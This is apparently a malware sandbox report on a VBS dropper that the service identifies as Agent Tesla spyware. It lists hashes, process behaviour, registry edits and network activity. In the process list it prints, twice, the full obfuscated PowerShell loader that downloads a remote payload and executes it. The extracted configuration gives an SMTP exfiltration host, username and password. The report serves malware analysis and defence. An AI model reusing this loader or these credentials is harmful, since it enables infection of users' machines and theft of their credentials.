File name:

6b3541fd675b6b9b1ab2450e632e54e8b950975a807e74f0e1e0d87563c9aca7.vbs

Full analysis: https://app.any.run/tasks/7dada979-0903-4dc6-b784-2f51e4a1c855
Verdict: Malicious activity
Threats:

Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold.

Malware Trends Tracker     >>>
Analysis date: March 19, 2024, 09:00:57
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
stealer
agenttesla
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines (335), with CRLF line terminators
MD5:

807AB2044EB4C9BE0AAE827CEF21DBE9

SHA1:

AFE94F9DFDC9D6CDAD94EBB8C6FEC4DD17FF2EC2

SHA256:

6B3541FD675B6B9B1AB2450E632E54E8B950975A807E74F0E1E0D87563C9ACA7

SSDEEP:

192:nLB+BSKoP0h+G4cszTHlyNWioYJ+dXhnlbp/Iu5YQioN1ytucyoS6AK2mFAt:kSwh+oszTHvYAZBSQJ4rS6BM

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Actions looks like stealing of personal data

      • wab.exe (PID: 3352)

    • Steals credentials from Web Browsers

      • wab.exe (PID: 3352)

    • AGENTTESLA has been detected (YARA)

      • wab.exe (PID: 3352)

    • Connects to the CnC server

      • wab.exe (PID: 3352)

    • AGENTTESLA has been detected (SURICATA)

      • wab.exe (PID: 3352)

    • Scans artifacts that could help determine the target

      • wab.exe (PID: 3352)

  • SUSPICIOUS

    • Creates FileSystem object to access computer's file system (SCRIPT)

      • wscript.exe (PID: 2496)

    • Runs shell command (SCRIPT)

      • wscript.exe (PID: 2496)

    • Suspicious use of asymmetric encryption in PowerShell

      • wscript.exe (PID: 2496)
      • powershell.exe (PID: 4076)

    • Reads data from a binary Stream object (SCRIPT)

      • wscript.exe (PID: 2496)

    • Starts POWERSHELL.EXE for commands execution

      • powershell.exe (PID: 4076)
      • wscript.exe (PID: 2496)

    • Reads security settings of Internet Explorer

      • wab.exe (PID: 3352)

    • Checks Windows Trust Settings

      • wab.exe (PID: 3352)

    • Connects to SMTP port

      • wab.exe (PID: 3352)

  • INFO

    • Creates or changes the value of an item property via Powershell

      • wscript.exe (PID: 2496)
      • powershell.exe (PID: 4076)

    • Checks supported languages

      • wab.exe (PID: 3352)

    • Reads the computer name

      • wab.exe (PID: 3352)

    • Checks proxy server information

      • wab.exe (PID: 3352)
      • slui.exe (PID: 2584)

    • Reads the machine GUID from the registry

      • wab.exe (PID: 3352)

    • Creates files or folders in the user directory

      • wab.exe (PID: 3352)

    • Reads Environment values

      • wab.exe (PID: 3352)

    • Reads Microsoft Office registry keys

      • wab.exe (PID: 3352)

    • Reads the software policy settings

      • slui.exe (PID: 2584)
      • wab.exe (PID: 3352)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report

AgentTesla

(PID) Process(3352) wab.exe
Protocolsmtp
Hostsmtp.crane-eletronics.com
Port587
Usernamepen@crane-eletronics.com
PasswordpeFyHns8
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
135
Monitored processes
6
Malicious processes
4
Suspicious processes
0

Behavior graph

Click at the process to see the details
start wscript.exe no specs powershell.exe no specs conhost.exe no specs powershell.exe no specs #AGENTTESLA wab.exe slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
2496"C:\WINDOWS\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\6b3541fd675b6b9b1ab2450e632e54e8b950975a807e74f0e1e0d87563c9aca7.vbs"C:\Windows\System32\wscript.exeexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft ® Windows Based Script Host
Exit code:
0
Version:
5.812.10240.16384
Modules
Images
c:\windows\system32\wscript.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2584C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
3352"C:\Program Files (x86)\windows mail\wab.exe"C:\Program Files (x86)\Windows Mail\wab.exe
powershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Contacts
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\mshtml.dll
c:\program files (x86)\windows mail\wab.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\advapi32.dll
AgentTesla
(PID) Process(3352) wab.exe
Protocolsmtp
Hostsmtp.crane-eletronics.com
Port587
Usernamepen@crane-eletronics.com
PasswordpeFyHns8
4076"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Stopover='konsekvente:\Narcomedusan';Set-Content $Stopover 'Recensure';$Eksemplificerings=Test-Path $Stopover;if($Eksemplificerings){exit};function Skamfnrr ($Palmegrens){For($maws=4; $maws -lt $Palmegrens.Length-1; $maws+=5){$Ths=$Ths+$Palmegrens.'Substring'($maws, 1)};$Ths;}$Konsultationstiders=Skamfnrr 'NonehTr.mt HantR.dup,uxusPer,:Jdek/Fabr/ ined eer,lexiBiclvLocueAf,r.Bakigun eoUnexo Samg GyrlmegaeUnso.Ud oc Whio VrdmAnco/The,uA,juc Dy,? ad.e Si,xtus pRoyaoBrisrMosctUn.p=ArordUnbeoMelew Plun RvelOptaoSticaPoledMori&Su eiSupid ab=Ble,1RetvEJo,i0ba,lz.hervMotoCMitoE,ileOMi,sdUrduYThymBGunnuKrsldEr.ru SelA.pitLSpilQC,loPForkUNitrcChriADemoT dpojAfpaQ FerZSchiNArchrDealBImprERefuPMediJ AutL QuaiSkab ';$transl=Skamfnrr ' DobiAmpheA atxStop ';$Multivariate = Skamfnrr 'Skil\VindsHmoryJvnhsdesiw Sy oNortwTaas6Du,e4Unc,\SpygWO,kli planW.aldEquaoP lewSpirsS.viPcasooHymnw S,ueAuslr So,SRverhLsble Blal pplTvan\ Fisv Exo1harm.,olo0Over\bounp AlloAbsiw SnueT asrTalisU.prhMoneeDisblStralFing. U.deBrstxA.steTran ';&($transl) (Skamfnrr ' ,ni$C.eiRTh re ortSi ooWooluAlarrEste=Ant.$Tro e omnnHrenvU.ex:Fo tw Pari Skyn eed,riniByger N,u ') ;&($transl) (Skamfnrr 'Disc$D scMDiosuSce lUnsotDepoiFlemv,ripaS adrSeseiC mpaGenntLge.eDiff=Sjkl$RessRNonreReintHymeo vuuPeoprOver+udda$AflsM satuBl tlKollt viimu tvBabyaP,elrK,ebiOlisa Ud t ,aleLing ') ;&($transl) (Skamfnrr ' Sid$V,ktSPj,tt krb BezeMistr,adea TronMakad Ade1Tyde4Sema8Spnd .egn=Tyve Ov.r( upe(Unsig conwNoncmUltriFilo DroswUnp.ialkan bru3Blac2 Aka_ForgpBe krBinnoMam,cDikteChlosRegisA,to s,i-.eseF Ung OverP,onirColloAugmcStaieSinns insudhuI VovdUnqu=Sell$ San{TrveP E sI SynDHair}Cave)publ.LisaC edioopermslynm LiaaLuftnUddadSemiLHandiD,senRelaeIn.o)Epi. Flo-Inkos Fldp,hrilStaniCom,t,ona ,mal[,fstcPro.h M.ta.nsur Kom]Hold3Suba4Afg. ');&($transl) (Skamfnrr 'Haru$ItalU DomhSpe,oUnasm HypoFi.tgho.tePo.tn dolienertFunneDisstSpareMycorUnspn Bo.eres sTi.e Afre=Co o T.ve$Wi hSvampt Cr.bGl weOverrParaaSlatnO erdMatr1Han 4 Blo8Uhyg[Ufor$ utS rect,ndvbSinie,acerN dsaAlamn DobdM,tr1 Idi4anke8fals.Ce.ecA teoLoriu,posnEmsitHarm- Blr2Sock]Ansv ');&($transl) (Skamfnrr ' Co $T.sts Chal TaioSamuwSkrimUnmaoDe.ltvan.iElfeoevitnProd=Kond(KaraTLi,heBelasopspt.nde-CognPHalvaVaritForfh,hri Zygo$CalmM ConuSkumlStrmtS amiBrokv SphaAnstrkr.li An.a.nfitStateVulg).all M no-AktiAUhf,nLabydStei Tet(Nyan[M.laIBockn mentGalvPLym,t FyrrAlba],etr:Band: RigsKasti M azU,obeAmus Ho u- gr.e AtoqVo.e Rent8He b) ,it ') ;if ($slowmotion) {&$Multivariate $Uhomogeniteternes;} else {;$Elkrafts=Skamfnrr 'UnhaSBetotSinua NonrlabotOffi- ParBAssoi .uit.idesKrneTA,tirScuraVenenBrefssmalfRakleTurbrKniv Sko-flyvSInteou,diuoverr Ti cTi.fe Pia oro$PizzKFtreoMo,onCispsM kiu NonlTvint ConaHi ttSt,viBerbo,rskn Fd sUdgit TiliGenndSisaemoserSk ms re bnke-a,ekDKllie SuasO.ertFrigiHanknseveaUnq.tFlapiResuoViatnUre Vene$Z,loRFraaeDenatStroo Friu slarS,aa ';&($transl) (Skamfnrr 'I ds$ErfaRSp,ceElectBoxho SteuMrkarNeur=Quad$SaxeeDitenJgervtelu:BemaaMorpp SampFragdCramaSolatBetea,iss ') ;&($transl) (Skamfnrr 'SkriITe rmMoanp KokoditmrForsta,te-SavlMRejsoNon dKi ouTrillTeleeEksi gudBBarsi RevtAfhssAft TAn kr olaHomonBifls UnafKne e fu rPreo ') ;$Retour=$Retour+'\Eucarpic.joy';while (-not $ingebeth) {&($transl) (Skamfnrr 'Rhyt$Frati.regnWracgForteR.bbb MeseArbet Redhsmal=Fle ( AfvTOvereUnplsBusst sy - ndlP Gr aAdmit TuthS ir .rs$ NonRUds eHarbtBrono,dliu M drAzoc)Carr ') ;&($transl) $Elkrafts;&($transl) (Skamfnrr 'PapnSPe.stGrataCondr Libt,uft-SchoSsognlTraceSp,reSnu.p Spe .dbl5P.co ');}&($transl) (Skamfnrr 'Pret$TudsFGeleo.uttlVarmkBrimeTontmTu.eiTheln ArydEmiteAmalfforloB,sirReolsCom,k StoeRecorklim mbr=Usik StriGG ngePia.tSkra-AnemC papo In nC,rtt S reAn.ans,ontD.fe Pill$MuscRFangeUnfutMeanoPestu errrFa.a ');&($transl) (Skamfnrr '.ati$TheoK AktoAndrmLo abd ngi StanBlndaCo.ntSolbiSmi.oNeg.nBe ae I,dnBesp6,ind2Kaar oul=Appr Sona[OmstS TemyVe.ssI.latThioeAr,emBir..Ads CBesvoS,mlnHandvAnaleGuarrH.lit .on]Ef e: .eb:GlimF Unrr nonoPresmClubB.evgaKl.rs Tyle nar6Tran4RntgS Vert SysrKrlii M.jnPapng Gra( wel$D bbF.assoOloml HuskNonde JuimBlu.iSapinAvo.dTotiekafff n roFo rr DiasDannk,roce lcrUnv,)Guri ');&($transl) (Skamfnrr 'B.od$.uldCGlitoR,selRes lMayhuregnt,ottocaserIllui ShieWhinsUnde Leva=Nonp Odre[g.olS oncy Vo.sBen tGenke PremP,eu. pilTTeleeD.lkxnonvtBa,l.dr aEGe.enSexocLarrom.didDingibre,nNoneg Tox]Fysi:.yss:handAAd.eSBirtC V,nI GenIA.ag.HowlGTo.ee KoktInv.SFrogt.nderEngaiSyc.nBeshgU,tr(B rh$Co,kKRet,opowdmMis,bOu siKo.sn K naJow tTinsiK,glo aoinForbeTripnDikt6 Tra2 fro)Gel, ');&($transl) (Skamfnrr ' .id$,riaK tolngensaEtikpFootnNonsi legnInkbgAftaeOve,nOp e=Pse.$ DatCSissoHistlA.kalIncau Natt HanoHjlprGaariB sweScats Hng.Ra,esL.ngudotabBlgesBristPapyrTelei PrenSkrig Flg(,klm3Kult2Nomo3Vold2 Bid6 Gay8Foru,Nonr3Rosm7Ani,1P,nw7Ford4wlon)N.ur ');&($transl) $Knapningen;}"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exewscript.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
c:\windows\system32\atl.dll
4968"C:\WINDOWS\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Stopover='konsekvente:\Narcomedusan';Set-Content $Stopover 'Recensure';$Eksemplificerings=Test-Path $Stopover;if($Eksemplificerings){exit};function Skamfnrr ($Palmegrens){For($maws=4; $maws -lt $Palmegrens.Length-1; $maws+=5){$Ths=$Ths+$Palmegrens.'Substring'($maws, 1)};$Ths;}$Konsultationstiders=Skamfnrr 'NonehTr.mt HantR.dup,uxusPer,:Jdek/Fabr/ ined eer,lexiBiclvLocueAf,r.Bakigun eoUnexo Samg GyrlmegaeUnso.Ud oc Whio VrdmAnco/The,uA,juc Dy,? ad.e Si,xtus pRoyaoBrisrMosctUn.p=ArordUnbeoMelew Plun RvelOptaoSticaPoledMori&Su eiSupid ab=Ble,1RetvEJo,i0ba,lz.hervMotoCMitoE,ileOMi,sdUrduYThymBGunnuKrsldEr.ru SelA.pitLSpilQC,loPForkUNitrcChriADemoT dpojAfpaQ FerZSchiNArchrDealBImprERefuPMediJ AutL QuaiSkab ';$transl=Skamfnrr ' DobiAmpheA atxStop ';$Multivariate = Skamfnrr 'Skil\VindsHmoryJvnhsdesiw Sy oNortwTaas6Du,e4Unc,\SpygWO,kli planW.aldEquaoP lewSpirsS.viPcasooHymnw S,ueAuslr So,SRverhLsble Blal pplTvan\ Fisv Exo1harm.,olo0Over\bounp AlloAbsiw SnueT asrTalisU.prhMoneeDisblStralFing. U.deBrstxA.steTran ';&($transl) (Skamfnrr ' ,ni$C.eiRTh re ortSi ooWooluAlarrEste=Ant.$Tro e omnnHrenvU.ex:Fo tw Pari Skyn eed,riniByger N,u ') ;&($transl) (Skamfnrr 'Disc$D scMDiosuSce lUnsotDepoiFlemv,ripaS adrSeseiC mpaGenntLge.eDiff=Sjkl$RessRNonreReintHymeo vuuPeoprOver+udda$AflsM satuBl tlKollt viimu tvBabyaP,elrK,ebiOlisa Ud t ,aleLing ') ;&($transl) (Skamfnrr ' Sid$V,ktSPj,tt krb BezeMistr,adea TronMakad Ade1Tyde4Sema8Spnd .egn=Tyve Ov.r( upe(Unsig conwNoncmUltriFilo DroswUnp.ialkan bru3Blac2 Aka_ForgpBe krBinnoMam,cDikteChlosRegisA,to s,i-.eseF Ung OverP,onirColloAugmcStaieSinns insudhuI VovdUnqu=Sell$ San{TrveP E sI SynDHair}Cave)publ.LisaC edioopermslynm LiaaLuftnUddadSemiLHandiD,senRelaeIn.o)Epi. Flo-Inkos Fldp,hrilStaniCom,t,ona ,mal[,fstcPro.h M.ta.nsur Kom]Hold3Suba4Afg. ');&($transl) (Skamfnrr 'Haru$ItalU DomhSpe,oUnasm HypoFi.tgho.tePo.tn dolienertFunneDisstSpareMycorUnspn Bo.eres sTi.e Afre=Co o T.ve$Wi hSvampt Cr.bGl weOverrParaaSlatnO erdMatr1Han 4 Blo8Uhyg[Ufor$ utS rect,ndvbSinie,acerN dsaAlamn DobdM,tr1 Idi4anke8fals.Ce.ecA teoLoriu,posnEmsitHarm- Blr2Sock]Ansv ');&($transl) (Skamfnrr ' Co $T.sts Chal TaioSamuwSkrimUnmaoDe.ltvan.iElfeoevitnProd=Kond(KaraTLi,heBelasopspt.nde-CognPHalvaVaritForfh,hri Zygo$CalmM ConuSkumlStrmtS amiBrokv SphaAnstrkr.li An.a.nfitStateVulg).all M no-AktiAUhf,nLabydStei Tet(Nyan[M.laIBockn mentGalvPLym,t FyrrAlba],etr:Band: RigsKasti M azU,obeAmus Ho u- gr.e AtoqVo.e Rent8He b) ,it ') ;if ($slowmotion) {&$Multivariate $Uhomogeniteternes;} else {;$Elkrafts=Skamfnrr 'UnhaSBetotSinua NonrlabotOffi- ParBAssoi .uit.idesKrneTA,tirScuraVenenBrefssmalfRakleTurbrKniv Sko-flyvSInteou,diuoverr Ti cTi.fe Pia oro$PizzKFtreoMo,onCispsM kiu NonlTvint ConaHi ttSt,viBerbo,rskn Fd sUdgit TiliGenndSisaemoserSk ms re bnke-a,ekDKllie SuasO.ertFrigiHanknseveaUnq.tFlapiResuoViatnUre Vene$Z,loRFraaeDenatStroo Friu slarS,aa ';&($transl) (Skamfnrr 'I ds$ErfaRSp,ceElectBoxho SteuMrkarNeur=Quad$SaxeeDitenJgervtelu:BemaaMorpp SampFragdCramaSolatBetea,iss ') ;&($transl) (Skamfnrr 'SkriITe rmMoanp KokoditmrForsta,te-SavlMRejsoNon dKi ouTrillTeleeEksi gudBBarsi RevtAfhssAft TAn kr olaHomonBifls UnafKne e fu rPreo ') ;$Retour=$Retour+'\Eucarpic.joy';while (-not $ingebeth) {&($transl) (Skamfnrr 'Rhyt$Frati.regnWracgForteR.bbb MeseArbet Redhsmal=Fle ( AfvTOvereUnplsBusst sy - ndlP Gr aAdmit TuthS ir .rs$ NonRUds eHarbtBrono,dliu M drAzoc)Carr ') ;&($transl) $Elkrafts;&($transl) (Skamfnrr 'PapnSPe.stGrataCondr Libt,uft-SchoSsognlTraceSp,reSnu.p Spe .dbl5P.co ');}&($transl) (Skamfnrr 'Pret$TudsFGeleo.uttlVarmkBrimeTontmTu.eiTheln ArydEmiteAmalfforloB,sirReolsCom,k StoeRecorklim mbr=Usik StriGG ngePia.tSkra-AnemC papo In nC,rtt S reAn.ans,ontD.fe Pill$MuscRFangeUnfutMeanoPestu errrFa.a ');&($transl) (Skamfnrr '.ati$TheoK AktoAndrmLo abd ngi StanBlndaCo.ntSolbiSmi.oNeg.nBe ae I,dnBesp6,ind2Kaar oul=Appr Sona[OmstS TemyVe.ssI.latThioeAr,emBir..Ads CBesvoS,mlnHandvAnaleGuarrH.lit .on]Ef e: .eb:GlimF Unrr nonoPresmClubB.evgaKl.rs Tyle nar6Tran4RntgS Vert SysrKrlii M.jnPapng Gra( wel$D bbF.assoOloml HuskNonde JuimBlu.iSapinAvo.dTotiekafff n roFo rr DiasDannk,roce lcrUnv,)Guri ');&($transl) (Skamfnrr 'B.od$.uldCGlitoR,selRes lMayhuregnt,ottocaserIllui ShieWhinsUnde Leva=Nonp Odre[g.olS oncy Vo.sBen tGenke PremP,eu. pilTTeleeD.lkxnonvtBa,l.dr aEGe.enSexocLarrom.didDingibre,nNoneg Tox]Fysi:.yss:handAAd.eSBirtC V,nI GenIA.ag.HowlGTo.ee KoktInv.SFrogt.nderEngaiSyc.nBeshgU,tr(B rh$Co,kKRet,opowdmMis,bOu siKo.sn K naJow tTinsiK,glo aoinForbeTripnDikt6 Tra2 fro)Gel, ');&($transl) (Skamfnrr ' .id$,riaK tolngensaEtikpFootnNonsi legnInkbgAftaeOve,nOp e=Pse.$ DatCSissoHistlA.kalIncau Natt HanoHjlprGaariB sweScats Hng.Ra,esL.ngudotabBlgesBristPapyrTelei PrenSkrig Flg(,klm3Kult2Nomo3Vold2 Bid6 Gay8Foru,Nonr3Rosm7Ani,1P,nw7Ford4wlon)N.ur ');&($transl) $Knapningen;}"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\syswow64\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\msvcrt.dll
c:\windows\syswow64\oleaut32.dll
6308\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exepowershell.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
Total events
14 495
Read events
14 471
Write events
24
Delete events
0

Modification events

(PID) Process:(2496) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(2496) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(2496) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(2496) wscript.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(4968) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(4968) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(4968) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(4968) powershell.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(3352) wab.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3352) wab.exeKey:HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
Executable files
0
Suspicious files
4
Text files
5
Unknown types
6

Dropped files

PID
Process
Filename
Type
4076powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rhfexjqm.4kt.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4968powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_lvz002jq.cws.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4968powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_2ybgm05j.yqa.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4076powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_dz2akq1x.3ov.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
3352wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAbinary
MD5:7ACEAAA0C8A5E52B497DACA8A50D37EB
SHA256:4FBE4734966E951935898F0B7D0F61CB088529A42E01FD4580945263DF646156
3352wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBAbinary
MD5:53CF11AC4A9DF33D2BF786392D3E6A17
SHA256:0E1E20A72BFB5F7AB41FA491E2E0687B288388E65EAA11485539BDD6AE167AB5
3352wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBAbinary
MD5:AC89A852C2AAA3D389B2D2DD312AD367
SHA256:0B720E19270C672F9B6E0EC40B468AC49376807DE08A814573FE038779534F45
3352wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_08872284D8414653D8A6B617C1164F2Dbinary
MD5:A6384E23EBEA2B95082022A9EAA0F346
SHA256:2865568586BAFF0C8C404940257D5FC586E495A267C169F875E3D22325B15A9C
3352wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EAbinary
MD5:DBA737766CAA750561A7D1EF422724CB
SHA256:5709B340759D61E0BE8D4258B9BA874F6DE6E02E9519E6BB5FF32CEF2F4B5D16
3352wab.exeC:\Users\admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_2517452929F0CAF6449847D40B7C277Dbinary
MD5:DC3BCD2BC8D3E814D4768E6FD184899B
SHA256:CCDBB4D96F100596B3FCBACF8866C86180033D2C94FC0BCB76298E01CB0797A1
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
8
TCP/UDP connections
34
DNS requests
15
Threats
3

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3732
SIHClient.exe
GET
200
184.30.21.171:80
http://www.microsoft.com/pkiops/crl/Microsoft%20ECC%20Update%20Secure%20Server%20CA%202.1.crl
unknown
binary
409 b
unknown
1260
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTrjrydRyt%2BApF3GSPypfHBxR5XtQQUs9tIpPmhxdiuNkHMEWNpYim8S8YCEAzlnDD9eoNTLi0BRrMy%2BWU%3D
unknown
313 b
unknown
3996
svchost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBSAUQYBMq2awn1Rh6Doh%2FsBYgFV7gQUA95QNVbRTLtm8KPiGxvDl7I90VUCEAJ0LqoXyo4hxxe7H%2Fz9DKA%3D
unknown
binary
471 b
unknown
4800
backgroundTaskHost.exe
GET
200
192.229.221.95:80
http://ocsp.digicert.com/MFEwTzBNMEswSTAJBgUrDgMCGgUABBQ50otx%2Fh0Ztl%2Bz8SiPI7wEWVxDlQQUTiJUIBiV5uNu5g%2F6%2BrkS7QYXjzkCEA177el9ggmWelJjG4vdGL0%3D
unknown
binary
471 b
unknown
3352
wab.exe
GET
200
172.217.16.131:80
http://ocsp.pki.goog/gtsr1/ME4wTDBKMEgwRjAJBgUrDgMCGgUABBQwkcLWD4LqGJ7bE7B1XZsEbmfwUAQU5K8rJnEaK0gnhS9SZizv8IkTcT4CDQIDvFNZazTHGPUBUGY%3D
unknown
binary
724 b
unknown
3352
wab.exe
GET
200
172.217.16.131:80
http://ocsp.pki.goog/gsr1/MFEwTzBNMEswSTAJBgUrDgMCGgUABBS3V7W2nAf4FiMTjpDJKg6%2BMgGqMQQUYHtmGkUNl8qJUC99BM00qP%2F8%2FUsCEHe9DWzbNvka6iEPxPBY0w0%3D
unknown
binary
1.41 Kb
unknown
3352
wab.exe
GET
200
172.217.16.131:80
http://ocsp.pki.goog/gts1c3/MFIwUDBOMEwwSjAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCEQCRd4hKrA6aBAnnS3UYBsso
unknown
binary
472 b
unknown
3352
wab.exe
GET
200
172.217.16.131:80
http://ocsp.pki.goog/gts1c3/MFEwTzBNMEswSTAJBgUrDgMCGgUABBTHLnmK3f9hNLO67UdCuLvGwCQHYwQUinR%2Fr4XN7pXNPZzQ4kYU83E1HScCECzpBwEAqmZNCdn%2B9lFcFjc%3D
unknown
471 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
239.255.255.250:1900
unknown
6140
svchost.exe
51.104.136.2:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
3996
svchost.exe
20.190.159.73:443
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
1280
MoUsoCoreWorker.exe
